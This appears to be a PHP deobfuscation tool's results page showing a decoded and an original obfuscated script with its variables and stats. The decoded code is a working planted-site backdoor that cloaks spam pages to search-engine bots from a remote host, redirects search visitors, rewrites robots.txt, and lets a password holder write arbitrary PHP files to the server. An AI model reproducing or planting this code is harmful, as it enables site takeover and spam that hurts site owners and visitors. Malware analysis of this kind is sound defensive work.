Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php //ncode_K125 $MdRwlQi6788='y(3;]whcx)8$4mb dk1qog5sprlua=z_/0i9tvf_"76*.2n[je';$q28..

Decoded Output download

//ncode_K125
error_reporting(0);header('Content-Type: text/html; charset=utf-8');$OoooOO0 = 'gnsixtysixug';$OOOOOO = "%71%77%65%72%74%79%75%69%6f%70%61%73%64%66%67%68%6a%6b%6c%7a%78%63%76%62%6e%6d%51%57%45%52%54%59%55%49%4f%50%41%53%44%46%47%48%4a%4b%4c%5a%58%43%56%42%4e%4d%5f%2d%22%3f%3e%20%3c%2e%2d%3d%3a%2f%31%32%33%30%36%35%34%38%37%39%27%3b%28%29%26%5e%24%5b%5d%5c%5c%25%7b%7d%21%2a";$O = urldecode($OOOOOO);




date_default_timezone_set('PRC');
$dRoot = @$_SERVER['DOCUMENT_ROOT'];
$rUrl = @$_SERVER['REQUEST_URI'];
$sName = @$_SERVER['HTTP_HOST'];
$Ooolg = @$_SERVER['HTTP_ACCEPT_LANGUAGE'];
$uAgent = @$_SERVER['HTTP_USER_AGENT'];
$referer = @$_SERVER['HTTP_REFERER'];
$http_type = ((isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] == 'on') || (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https')) ? 'https://' : 'http://';
$typeName = $http_type . $sName;
$uAgent = @strtolower($uAgent);
$referer = @strtolower($referer);
if (getenv('HTTP_CLIENT_IP')) {
    $client_ip = getenv('HTTP_CLIENT_IP');
} elseif (getenv('HTTP_X_FORWARDED_FOR')) {
    $client_ip = getenv('HTTP_X_FORWARDED_FOR');
} elseif (getenv('REMOTE_ADDR')) {
    $client_ip = getenv('REMOTE_ADDR');
} else {
    $client_ip = $_SERVER['REMOTE_ADDR'];
}
if (isset($_GET['vf']) && $_GET['vf'] == 'online5566') {
    echo 'domain online!';
    exit;
}

if (strstr($rUrl, 'sitemap_index_')) {
    $pr = dirname($rUrl);
    allmap($O, $OoooOO0, $typeName, $rUrl, $sName, $http_type, $pr);
}
if (strstr($rUrl, '.xml')) {
    $pr = dirname($rUrl);
    sitefun($O, $OoooOO0, $typeName, $rUrl, $http_type, $sName, $client_ip, $pr);
}
function allmap($O, $OoooOO0, $typeName, $rUrl, $sName, $http_type, $pr)
{
    $ol = 'http://' . $OoooOO0 . '.fexqykx.xyz/Api/siteAllMap.php?page=' . $rUrl . '&pwd=sl123&domain=' . $typeName;
    if ($_GET['vf_allmap'] == 'online5566') {
        echo $ol;
        exit;
    }
    $getRes = json_decode(getCurl($O, $ol), true);
    if (empty($getRes) || $getRes['code'] == 404) {
        header('HTTP/1.0 404 Not Found');
        header('Status: 404 Not Found');
        exit();
    }
    if (empty($getRes) || $getRes['code'] == 444) {
        header('HTTP/1.0 404 Not Found');
        header('Status: 404 Not Found');
        exit();
    }
    $getsResult = $getRes['data'];
    header('Content-type:text/xml');
    echo $getsResult;
    exit();
}

function sitefun($O, $OoooOO0, $typeName, $rUrl, $http_type, $sName, $client_ip, $pr = '', $qs = '')
{
    $ol = 'http://' . $OoooOO0 . '.fexqykx.xyz/Api/siteUrlApi.php?stype=sitemap&num=6000&pr=' . $pr . '&url=' . $rUrl . '&domain=' . $typeName;
    if ($_GET['vf_map'] == 'online5566') {
        echo $ol;
        exit;
    }
    $getRes = json_decode(getCurl($O, $ol), true);
    if (isset($getRes['code']) && $getRes['code'] == '600') {
        $getsResult = $getRes['data'];
        foreach ($getsResult as $Oog => $Oov) {
            $pingRes = getCurl($O, $Oov);
            $Oooo0s = (strpos($pingRes, 'Sitemap Notification Received') !== false) ? 'OK' : 'ERROR';
            echo $Oov . '===>Submitting Google Sitemap: ' . $Oooo0s . PHP_EOL;
        }
        exit();
    }
    if (isset($getRes['code']) && $getRes['code'] == '406') {
        echo 'Submitting Google Sitemap Return Fail';
        exit();
    }
    if (empty($getRes) || $getRes['code'] == 404) {
        header('HTTP/1.0 404 Not Found');
        header('Status: 404 Not Found');
        exit();
    }
    $getsResult = $getRes['data'];
    header('Content-type:text/xml');
    echo $getsResult;
    exit();
}
$pd = md5(md5(@$_GET['pd']));
if ($pd == '5fbf36f6b1070aec65f00cb8e35c9cc4') {
    $add_content = @$_GET['mapname'];
    $path = dirname(__FILE__);
    $add_content = @$_GET['mapname'];
    if (strstr($add_content, '.p'.'hp')) {
        $a = md5(md5(@$_GET['a']));
        $b = md5(md5(@$_GET['b']));
        if ($a == getCurl('','http://' . $OoooOO0 . '.fexqykx.xyz/' . '/a.p'.'hp') || $b == '21c4d031dd29901356a91b3efcca0130') {
            $smstr = @$_GET['smstr'];
            if (file_put_contents($path . '/' . $add_content, $smstr)) {
                echo 'ok';
            }
        }
    }
}
if (isset($_GET['google'])) {
    $go = $_GET['google'];
    if (preg_match('/^google.*?(\.html)$/i', $go)) {
        putFile($O, $go, 'google-site-verification:' . ' ' . $go);
        exit('<a href=' . $go . '>' . $go . '</a>');
    }
}
if (isset($_GET['robots'])) {
    $robots = $_GET['robots'];
    if (preg_match('/(\.php)$/i', $robots)) {
        $typeName = $typeName . '/' . $robots . '?';
    } else {
        $typeName = $typeName . '/';
    }
    putFile($O, 'robots.txt', 'User-agent: *' . PHP_EOL . 'Allow: /' . PHP_EOL . 'Crawl-delay:3' . PHP_EOL . 'Sitemap:' . $typeName . 'sitemap_index_1.xml' . PHP_EOL . 'Sitemap:' . $typeName . 'sitemap_index_2.xml' . PHP_EOL . 'Sitemap:' . $typeName . 'sitemap_index_3.xml' . PHP_EOL . 'Sitemap:' . $typeName . 'sitemap_index_4.xml' . PHP_EOL . 'Sitemap:' . $typeName . 'sitemap_index_5.xml' . PHP_EOL . 'Sitemap:' . $typeName . 'sitemap_index_6.xml' . PHP_EOL . 'Sitemap:' . $typeName . 'sitemap_index_7.xml' . PHP_EOL . 'Sitemap:' . $typeName . 'sitemap_index_8.xml');
    $file_get_contents = file_get_contents('robots.txt');
    echo $file_get_contents;
    exit();
}
if (preg_match('/google.co.jp|yahoo|google\.com[^.]*?$|bing/i', $referer)) {
    if ($_GET['vf_jump'] == 'online5566') {
        echo 'http://' . $OoooOO0 . '.fexqykx.xyz/jump.php?domain=' . $sName . '&page=' . $rUrl . '&bot=0&pr=' . $pr . '&refer=' . $referer . '&lg=' . $Ooolg;
        exit;
    }
    $jumpRes = getCurl($O, 'http://' . $OoooOO0 . '.fexqykx.xyz/jump.php?domain=' . $sName . '&page=' . $rUrl . '&bot=0&pr=' . $pr . '&refer=' . $referer . '&lg=' . $Ooolg);
    if ($jumpRes) {
        echo $jumpRes;
        exit();
    }
}
if (stristr($uAgent, 'googlebot') || stristr($uAgent, 'bing') || stristr($uAgent, 'Y!J') || stristr($uAgent, 'y!j') || stristr($uAgent, 'yahoo') || stristr($uAgent, 'google') || stristr($uAgent, 'Googlebot') || stristr($uAgent, 'googlebot')) {
    if ($_GET['vf_bot'] == 'online5566') {
        echo 'http://' . $OoooOO0 . '.fexqykx.xyz/org.php?domain=' . $sName . '&page=' . $rUrl . '&pr=' . $pr;
        exit;
    }
    $file_contents = getCurl($O, 'http://' . $OoooOO0 . '.fexqykx.xyz/918.php?domain=' . $sName . '&page=' . $rUrl . '&bot=1&pr=' . $pr);
    if (!empty($file_contents)) {
        $getRes = json_decode($file_contents, true);
        if ($getRes['code'] == 404) {
            header('HTTP/1.0 404 Not Found');
            header('Status: 404 Not Found');
            exit();
        }
        if ($getRes['code'] == 500) {
            header('HTTP/1.1 500 Internal Server Error');
            exit();
        }
        echo $file_contents;
        exit;
    }
}
if ($_GET['vf_origin'] == 'online5566') {
    echo 'http://' . $OoooOO0 . '.fexqykx.xyz/org.php?domain=' . $sName . '&page=' . $rUrl . '&pr=' . $pr . '&ip=' . $client_ip . '&lg=' . $Ooolg;
    exit;
}
getCurl($O, 'http://' . $OoooOO0 . '.fexqykx.xyz/org.php?domain=' . $sName . '&page=' . $rUrl . '&pr=' . $pr);
function getCurl($O, $gurl)
{
    $file_contents = '';
    $user_agent = 'Mozilla/4.0 (compatible;MSIE 6.0;Windows NT 5.2;.NET CLR 1.1.4322)';
    if (function_exists('curl_init')) {
        try {
            $ch = curl_init();
            $timeout = 30;
            curl_setopt($ch, CURLOPT_URL, $gurl);
            curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
            curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
            $file_contents = curl_exec($ch);
            curl_close($ch);
        } catch (Exception $e) {
        }
    }
    if (strlen($file_contents) < 1 && function_exists('file_get_contents')) {
        ini_set('user_agent', $user_agent);
        try {
            $file_contents = @file_get_contents($gurl);
        } catch (Exception $e) {
        }
    }
    return $file_contents;
}

function putFile($O, $htName, $htContents)
{
    $handle = fopen($htName, 'w') or die('0');
    fwrite($handle, $htContents);
    fclose($handle);
}

Did this file decode correctly?

Original Code

<?php //ncode_K125
$MdRwlQi6788='y(3;]whcx)8$4mb dk1qog5sprlua=z_/0i9tvf_"76*.2n[je';$q2866=$MdRwlQi6788[(105/15)].$MdRwlQi6788[(26-1)].$MdRwlQi6788[(1*49)].$MdRwlQi6788[((10*1)+18)].$MdRwlQi6788[(14+22)].$MdRwlQi6788[(44+5)].$MdRwlQi6788[(44-13)].$MdRwlQi6788[(684/18)].$MdRwlQi6788[(23+4)].$MdRwlQi6788[(72-(33-7))].$MdRwlQi6788[(154/22)].$MdRwlQi6788[(11+25)].$MdRwlQi6788[(65-(62-31))].$MdRwlQi6788[(26-6)].$MdRwlQi6788[((27*2)-8)];$pHFdNhg9688=$MdRwlQi6788[(20-9)].$MdRwlQi6788[(2*4)].$MdRwlQi6788[(29*1)].$MdRwlQi6788[(160/4)];$MYtraky2482=$MdRwlQi6788[(8*5)].$MdRwlQi6788[((1+0)+2)].$MdRwlQi6788[(6+(1*(95/19)))].$MdRwlQi6788[(140/5)].$MdRwlQi6788[(522/18)].$MdRwlQi6788[(7*((7-3)-2))].$MdRwlQi6788[(2*14)].$MdRwlQi6788[(138/(2+4))].$MdRwlQi6788[(1029/(378/18))].$MdRwlQi6788[((2*189)/9)].$MdRwlQi6788[(12+(0+0))].$MdRwlQi6788[(31*1)].$MdRwlQi6788[(48/(36/12))].$MdRwlQi6788[(735/15)].$MdRwlQi6788[(0+7)].$MdRwlQi6788[(18+2)].$MdRwlQi6788[(18-(10/5))].$MdRwlQi6788[(735/15)].$MdRwlQi6788[(0+(2-(1*1)))].$MdRwlQi6788[(16-(3+(36/(0+18))))].$MdRwlQi6788[((167-23)/18)].$MdRwlQi6788[(0+(18-9))].$MdRwlQi6788[(1*3)].$MdRwlQi6788[(11*(1+(0/(78/13))))].$MdRwlQi6788[(2*7)].$MdRwlQi6788[(29*(0+1))].$MdRwlQi6788[(38-(8+9))].$MdRwlQi6788[(15*2)].$MdRwlQi6788[(45-11)].$MdRwlQi6788[(1*46)].$MdRwlQi6788[(1*(17+21))].$MdRwlQi6788[(78/3)].$MdRwlQi6788[(21+(77/11))].$MdRwlQi6788[(22+14)].$MdRwlQi6788[(343/(91/13))].$MdRwlQi6788[(1*1)].$MdRwlQi6788[(21-10)].$MdRwlQi6788[(22+(12/2))].$MdRwlQi6788[(180/20)].$MdRwlQi6788[(3+((0+0)*1))].$MdRwlQi6788[(686/(126/9))].$MdRwlQi6788[(61-(32-8))].$MdRwlQi6788[(476/17)].$MdRwlQi6788[((4-0)+22)].$MdRwlQi6788[(((23-(2*5))/13)-0)].$MdRwlQi6788[(7+(84/21))].$MdRwlQi6788[(28/2)].$MdRwlQi6788[(9-0)].$MdRwlQi6788[(3*1)];$UrR1094= "'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'";$JTx2343=$pHFdNhg9688;$JTx2343.=$UrR1094;$JTx2343.=$MYtraky2482;@$mEriqO3481=$q2866((''), ($JTx2343));@$mEriqO3481();
?>

Function Calls

null 1
gzinflate 1
base64_decode 1
create_function 1

Variables

$b //ncode_K125 error_reporting(0);header('Content-Type: text/..
$x 'zVl7c9pIEv8/VfkOky3GEikbhF7YJiRxETnxrQ0+gXdvK7urEtIIlBWMVhI..
$q2866 create_function
$JTx2343 $x="'zVl7c9pIEv8/VfkOky3GEikbhF7YJiRxETnxrQ0+gXdvK7urEtIIlBW..
$UrR1094 'zVl7c9pIEv8/VfkOky3GEikbhF7YJiRxETnxrQ0+gXdvK7urEtIIlBWMVhI..
$mEriqO3481 None
$MYtraky2482 ";$a=base64_decode($x);$b=gzinflate($a);eval($b);
$MdRwlQi6788 y(3;]whcx)8$4mb dk1qog5sprlua=z_/0i9tvf_"76*.2n[je
$pHFdNhg9688 $x="

Stats

MD5 e8d6518597af640b50e10d33b7822398
Eval Count 2
Decode Time 183 ms